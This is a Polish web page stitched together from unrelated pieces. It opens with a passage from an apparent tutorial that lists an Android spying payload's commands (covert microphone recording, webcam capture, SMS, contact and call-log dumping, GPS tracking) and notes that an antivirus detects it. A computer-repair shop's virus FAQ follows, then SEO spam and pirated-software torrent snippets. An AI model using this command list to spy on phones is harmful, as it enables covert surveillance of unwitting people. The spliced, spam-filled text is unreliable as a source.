Poniżej zestawiliśmy kilka najciekawszych możliwości naszego dostarczonego złośliwego ładunku:

 • record_mic – umożliwia utworzenie podsłuchu telefonu za pomocą wbudowanego w urządzenie mikrofonu.
 • webcam_chat – komenda pozwala rozpocząć czat wideo z zainfekowanym telefonem.
 • webcam_snap – wykonuje zdalnie zdjęcie aparatem telefonu, a następnie automatycznie nam je przesyła.
 • webcam_stream – uruchomia mikrokamere w telefonie, która umożliwia podgląd osoby na żywo.
 • dump_calllog – przechwytywanie logów połączeń wykonywanych i przychodzących do osoby.
 • dump_contacts – przechwytywanie zapisanych kontaktów w smartfonie.
 • dump_sms -szpieg sms, który umożliwia skopiowanie wszystkich wiadomości do pliku tekstowego w naszym systemie operacyjnym. W gruncie rzeczy mimo technicznej odmienności od typowego keyloggera, możemy tą funkcje uznać z powodzeniem za tego typu funkcjonalność mobilną.
 • geolocate – lokalizacja telefonu komórkowego za pomocą wbudowanego odbiornika GPS.
 • send_sms – możliwość wysyłania wiadomości SMS z zainfekowanego systemu operacyjnego Android.
 • wlan_geolocate – geolokalizacja telefonu za pomocą sieci bezprzewodowych Wi-Fi znajdujących się  w okolicy.

Oczywiście komend jest dużo więcej i widać to na dołączonym powyżej naszym filmie. Poniższy zrzut ekranu obrazuje przechwycone wiadomości SMS z systemu Android w wersji 4.4.

Wiadomość tekstowa w systemie Android
Przechwycone wszystkie dostępne wiadomości z zainfekowanego systemu operacyjnego Android za pomocą polecenia dump_sms

Czy antywirus Android jest potrzebny

W celu dopełnienia tego wpisu postanowiłem sprawdzić czy skanowanie programem antywirusowym w systemie Android wykryje zagrożenie. Odpowie to Tobie na pytanie czy jest sens używania antywirusów, ponieważ wiele osób nadal to neguje. Odpowiedź prosta…

Nawet hejtowany program Avast Free Mobile Security wykrył zagrożenie w złośliwej aplikacji MainActivity.

Tak jak widać jest sens wykonywania cyklicznego skanowania swojego urządzenia mobilnego i nawet jego szyfrowania. Ten drugi przypadek ochroni nasze dane po kradzieży urządzenia. Warto przy okazji przejrzeć nas test antywirusów 2016 na system android:

Najlepszy antywirus Android | TEST ANTYWIRUSÓW 2016

Jeśli chcesz być na bieżąco pamiętaj o polubieniu naszego fanpage na facebooku tutaj Windows 8 Manager Yamicsoft

Pozdrawiamy i owocnej nauki komputerowcy!

Custom Event All in One Floor Extended Printed Backdrop .

1. Dlaczego mój laptop się nagrzewa

Powodem nagrzewania się laptopa, jest przeciążenie procesora. Jeśli laptop lub desktop ma zanieczyszczony system poprzez działające niewidoczne złośliwe oprogramowanie, robaki, trojany lub wirusy, wówczas komputer potrzebuje więcej mocy aby programy te mogły pracować. Przegrzewanie komputera prowadzi do uszkodzenia podzespołów co zwiększa koszty naprawy komputera. Ponadto jeśli komputera nie uszkodzi virus bezpośrednio, to uszkodzi go pośrednio, ponieważ przeciążony komputer potrzebuje więcej chłodzenia, wiec wiatraki ciągną więcej powietrza a wraz z powietrzem większą ilość kuzu, który zapycha przewody chłodzące co jednocześnie ogranicza dostęp powietrza i w rezultacie pali komputer.

2. Dlaczego mój komputer jest wolny

Powodem wolnej pracy komputera zazwyczaj jest nadmierne zanieczyszczenie systemu. W trakcie użytkowania komputera instalowane są programy oraz rożnego rodzaju dodatki niezbędne do korzystania z Internetu, nawet jeśli usuniemy niektóre programy, cześć plików aplikacji pozostaje w systemie. Ponadto instalując programy, producenci oprogramowania załączają nam w pakiecie rzeczy, których nie potrzebujemy co jednocześnie powoduje zaśmiecanie naszego komputera.

3. Czemu mój komputer łapie wirusy

Należy pamiętać aby mieć zawsze aktualna ochronę antywirusową, wystarczy kilka minut surfowania po Internecie bez antywirusa aby do naszego komputera wkradły robaki internetowe, trojany lub wirusy.

4. Posiadam aktualny program antivirus a do mojego komputera wkradł się virus.

Pomimo tego ze mamy aktualny antivirus to wirusy mogą się wkraść, wystarczy że instalujemy jakieś oprogramowanie, najczęściej darmowe, w którym haker zamieścił wirusy. W większości przypadków w regulaminie jest informacja że instalowane oprogramowanie zawiera dodatki, lecz kto z nas to czyta, klikamy dalej i instalujemy program razem ze złośliwymi programami zwalniając przy tym nasz antywirus z odpowiedzialności za to co wchodzi do komputera, czyli można powiedzieć, świadomie wpuszczamy intruza do naszego komputera a antywirus nie może nam tego zabronić, ponieważ wyraziliśmy na to zgodę akceptując warunki instalacji.

5. Jak wirusy mogą zaszkodzić mojemu komputerowi

W sieci krążą miliony odmian wirusów służących do rożnego rodzaju przestępstw itp., nie zastanawiamy się, co nam grozi, gdy mamy w komputerze wirusa. Przede wszystkim wirusy szkodzą naszemu komputerowi, pracując niewidzialnie, przegrzewając go i zużywając w bardzo szybkim tempie podzespoły komputera. Oprócz tego wirusy spowalniają nasz komputer a przy połączeniu z internetem zużywają transfer danych wysyłając nasze dane w świat. Nikt nie wie gdzie trafiają nasze pliki, logi i poufne dane. Musisz wiedzieć ze wszystko to co piszesz na klawiaturze znajduje się w twoim komputerze, dane do logowania, hasła, zdania frazy, wyniki wyszukiwań, dane kart płatniczych, dane do portali społecznościowych itp, wszystko to może być wysłane w każdej chwili z twojego komputera do handlarzy danych i przestępców internetowych. Poprzez specjalistyczne oprogramowanie, składane jest to wszystko w logiczną całość co przewala hakerowi mieć wgląd w to co pisałeś na klawiaturze, włącznie z poufnymi dymami. A co jeśli haker będzie chciał wykorzystać nasze prywatne zdjęcia

6. Nie mam ważnych danych, czy wirusy mogą mi zaszkodzić

Oczywiście że tak. Pomimo tego, że nie logujesz się do kont bankowych lub nie płacisz kartą, wystarczy że korzystasz z Internetu. Bardzo popularne są przestępstwa internetowe na tak zwany "słupek". Przestępcy internetowi wysyłają wirusy, które przechwytują komputery przeciętnych użytkowników po to, aby w dostać się do komputera przeciętnego Kowalskiego, wówczas za pośrednictwem jego komputera dokonywane są nielegalne transakcje internetowe, np: zakupu skradzionymi kartami, wysyłanie gróźb lub anonimowych powiadomień (również terrorystycznych), dzięki temu Policja lub FBI trafia do nieświadomego użytkownika i to on brany jest pod obserwację, nie mówiąc już o tym że na jakiś czas zostanie pozbawiony wszystkich komputerów w domu lub firmie zanim sprawa się wyjaśni, nie wspominając o kosztach adwokata. Nie ma wytłumaczenia, "że to nie ja!", służby mają adres IP komputera, numer karty sieciowej, adres zamieszkania i to im wystarczy by przewrócić życie niewinnego człowieka "do góry nogami". Wygląda to z pozoru na mało prawdopodobne, ale niestety bardzo często spotykane i stosowane przez przestępców internetowych, gdyż nie narażają siebie na problemy tylko tak zwane "słupy"

7. Rzadko korzystam z komputera, czy jest on też narażony na ataki wirusów

Wystarczy kilka minut w Internecie, aby mogła dokonać się synchronizacja naszych danych z serwerami hakera. Jeśli nie mamy wrażliwych danych w komputerze, to prawie każdy posiadacz komputera ma pocztę email lub loguje się do jakiegoś portalu internetowego. To wystarczy, jeśli nie my, to nasi znajomi i bliscy padną ofiarą hakera przez nasz zawirusowany komputer. Haker za pośrednictwem złośliwego oprogramowania, (często są to kolorowe przyciski w przeglądarce internetowej zwane toolbarami) pobiera dane do logowania do naszej poczty, po to aby pozyskać z niej adresy email naszych znajomych lub klientów. Takie adresy są zazwyczaj sprawdzone i pewne, wiec można je sprzedać średnio po $25 za sztukę innym hakerom którzy w naszym i mieniu wysyłają naszym znajomym lub klientom proste wiadomości z załącznikiem lub linkiem. Prawie 99% osób kliknie na link lub otworzy załącznik, jeśli otrzyma go od nas w dodatku podpisany naszym imieniem i nazwiskiem zarażając przy tym ich komputery. Właśnie tak nasi znajomi często otrzymują od nas korespondencje z niespodziankami których nie wysłaliśmy, być może ty tez otrzymałeś od znajomego email którego on nie wysłał.

8. Czy z powodu wirusów lub trojanów w komputerze moja prywatność może być zagrożona

Oczywiście, jeśli w twoim komputerze za pomocą wirusa ktoś zainstalował oprogramowanie szpiegowskie, to możesz być podsłuchiwany lub podglądany za poprzez wbudowana w laptop kamerę. Obecna technika pozwala hakerowi całkowicie przejąć kontrolę nad twoim komputerem bez wiedzy użytkownika, nawet jeśli komputer jest w stanie uśpienia.


9. Dlaczego hakerzy tworzą wirusy

To proste, dla pieniędzy. Obecnie największą ilość przestępstw dokonywana jest przez Internet, to najbardziej dochodowy rynek o skali globalnej. Wystarczy milion pozyskanych numerów kart kredytowych lub kont bankowych, aby co miesiąc pobrać $1, z tytułu niepozornej opłaty bankowej lub coś podobnego, wczas haker zarabia milion dolarów miesięcznie. To dla nas niewielka kwota i mało kto zwraca uwagę na to jeśli nawet pojawi się na wyciągu z konta, zaś dla hakera to przysłowiowe "ziarnko", a ziarnko do ziarnka to uzbiera się milion.

Zdarzają się również tacy specjaliści co potrafią wyciągnąć od użytkownika większe pieniądze, najpierw dostają się do komputera, sprawdzają wartość danych a następnie szyfrują je i pozostawiają użytkownikowi komunikat że jego dane zostały zaszyfrowane i jeśli chce je odszyfrować, to musi zapłacić ($400 lub $500) przez Western Union lub inna metodą nie namierzalną. Są tacy co płacą bo za wszelką cenę cha odzyskać dokumenty firmowe niezbędne do pracy, lecz na próżno, gdyż i tak haker nie zwróci im plików. W takich przypadkach jak najszybciej należy zgłosić się do nas, wówczas są duże szanse ze pliki da się odzyskać.

10. Czy drogi program antywirusowy dobrze zabezpieczy mój komputer

Drogi nie zawsze oznacza dobry. Program antywirusowy może być drogi, ponieważ zawiera więcej opcji zabezpieczeń niż tańszy, lecz nie wszystkie opcje zabezpieczeń są nam potrzebne. Wiadomo że każda firma chce sprzedawać zwoje produkty dając nam dodatkowe opcje. Musimy to tez brać pod uwagę, ponieważ zbyt dużo zabezpieczeń ogranicza działanie naszego komputera oraz bardziej obciąża system i spowalnia komputer. Ważne jest, aby oprogramowanie antywirusowe było dostosowane optymalnie do naszych potrzeb.

Jeśli jesteś naszym klientem lub nim zostaniesz, otrzymasz od nasz bezpłatnie oprogramowanie antywirusowe dożywotnio na wszystkie komputery, które posiadasz, wystarczy że wyczyścimy twój komputer. W cenie antywirusa otrzymasz czysty nowy system, do którego wgramy program antywirusowy, potem wystarczy co rok przychodzić po bezpłatne odnowienie licencji i nie musisz martwić się o zakup antywirusa.

Mamy nadzieje, że powyższy poradnik trochę uświadomi cię jak działają wirusy, chociaż i tak nie wszystko zostało opisane, jest tego naprawdę dużo, że można byłoby napisać grubą książkę, lecz jeśli chcesz wiedzieć więcej, zawsze możesz do nas przyjść po informację i poradę.

Musisz pamiętać ze tak jak choruje człowiek, podobnie choruje też komputer, ponieważ system operacyjny jest jak nasze zdrowie. Tez łapiemy rożnego rodzaju wirusy, grypa, katar itp, tak samo wirusy łapie nasz komputer, więc jeśli z grypa idziemy do lekarza, to wypadało by tez przyjść do nas z komputerem, gdy on złapie wirusa. Jeśli nie wiesz czy twój komputer jest zainfekowany, to zawsze możesz go sprawdzić u nas  bezpłatnie.

Prowadzimy naprawy komputerów w Hickory Hills, Chicago, Justice, Chicago Ridge, Orland Park, Bridgeview, Burbank, Oak Lawn, Lemont, Palos Hills, Worth, Palos Heights, Palos Park, Willow Springs, Hodgkins, Countryside, La Grange, Bedford Park, Hometown, Alsip, Homer Glen, Lockport, Mokena, Tinley Park, Orland Hills, Romeoville, Bolingbrook, Darien, Burr Ridge, Woodridge, Palisades, Summit, Chicago Midway, Forest View, Crestwood, Oak Forest oraz wszystkie nie wymienione miejscowości.

Prowadzimy również naprawy domowe, naprawiamy w domu lub zabieramy sprzęt do naszego zakładu i po naprawie odwozimy do klienta i podłączmy. Wyceniamy koszt napraw bezpłatnie, w większości przypadków, 95% wycen są bez konieczności rozkręcania komputera i są natychmiastowe. Nasze wyceny są zawsze zobowiązujące, oznacza to że jeśli otrzymasz wycenę kosztów naprawy, to nigdy nie zapłacisz więcej niż wyceniono Photo Supreme 1.8.0.119{h33t}{worldend}

Related articles

Splash PRO EX v1.13.2 - . Splash PRO EXTempatnya Download Software Gratis di Indonesia, Download Software dan Games terbaru Full Version, Download IDM Full Crack, Free Download Software.,The Pittsburgh Steelers filled a need in the defensive backfield by landing former Green Bay Packers safety Morgan Burnett, who signed a three-year contract.,Splash . .

Nero Platinum 2018 Suite - Award-winning all-rounder Nero Burning ROMDownload torrent. Backup or compilation creates compact mixture was easier than with Nero Burning ROM. Conversion of physical media for digital paths for use anywhere .,Nero Burning ROM ist ein Brennprogramm der Nero AG, das sowohl als Teil des Programmpakets Nero Multimedia Suite, als auch als Einzelprodukt erhaltlich ist.,Nero Burning Rom download gratis. Pagina per scaricare il programma Nero Burning Rom

Windows 7 - Wikipedia Windows 7 Home Premium SP1 NLЧто такое ИМХО. ИМХО (имхо, Имхо) – часто встречающееся в форумах и Интернет-конференциях .,ICT Office Centre - Alle acties en speciale prijzen voor de beste artiekelen Digitale download software,Antivirus test juli 2018 voor Windows 7 SP1 Windows 8.1 en Windows 10. De afgelopen week zijn er weer een 23 tal antivirus pakketten getest voor het Microsoft pakket .

<< Go back to the previous page